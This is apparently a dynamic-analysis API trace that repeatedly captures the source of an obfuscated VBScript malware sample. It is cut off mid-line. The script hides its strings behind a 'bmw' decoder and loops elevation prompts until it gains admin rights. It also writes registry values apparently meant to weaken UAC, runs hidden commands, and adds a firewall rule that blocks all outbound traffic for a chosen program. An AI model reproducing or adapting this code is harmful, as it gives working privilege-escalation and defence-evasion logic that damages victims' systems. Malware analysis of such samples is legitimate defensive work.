Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0223.000] wcsncmp (_String1=" rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.000] wcsncmp (_String1="rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.001] wcsncmp (_String1="ule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.001] wcsncmp (_String1="le in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.001] wcsncmp (_String1="e in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 